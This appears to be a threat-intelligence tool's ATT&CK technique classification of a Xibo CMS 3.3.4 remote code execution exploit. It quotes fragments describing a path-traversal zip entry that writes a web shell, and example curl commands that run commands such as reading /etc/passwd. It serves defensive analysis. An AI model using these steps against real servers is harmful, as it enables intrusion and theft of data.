ATT&CK techniques detected
5 predictions
T1190 Exploit Public-Facing Application
“[webapps] xibocms 3.3.4 - rce xibocms 3.3.4 - rce # exploit title: xibocms 3.3.4 - remote code execution # google dork: n/a # date: 2025-11-18 # exploit author: complexusprada # vendor homepage: https://xibo.org.uk/ # software link: https://github.…”
T1190 Exploit Public-Facing Application
“: http://<target>/shell.php?cmd=<command> # example: curl 'http://target/shell.php?cmd=id' # mitigation: # upgrade to patched versions: # - xibo cms 2.3.17+ (for 2.x branch) # - xibo cms 3.3.5+ (for 3.x branch) # disclaimer: # this exploi…”
T1068 Exploitation for Privilege Escalation
“cmd=<command>") print("\n[*] example:") print("curl 'http://target/shell.php?cmd=id'") print("curl 'http://target/shell.php?cmd=cat%20/etc/passwd'") print() except Exception as e: print(f"[-] error creating exploit…”
T1190 Exploit Public-Facing Application
“…tr('mapping.json', json.dumps(mapping_json)) # critical: the file path in the zip must match what xibo expects # xibo calls: $zip->getStream('library/'.$file['file']) # therefore we place the file at: library/../../web/shell.php zf.writes…”
T1505.003 Web Shell
“: "../../web/shell.php", ...} # xibo reads: library/ + ../../web/shell.php # xibo writes: /var/www/cms/library/temp/ + ../../web/shell.php # result: /var/www/cms/web/shell.php (webshell in web root!) # prerequisites: # - valid xibo cms…”
Summary
xibocms 3.3.4 - RCE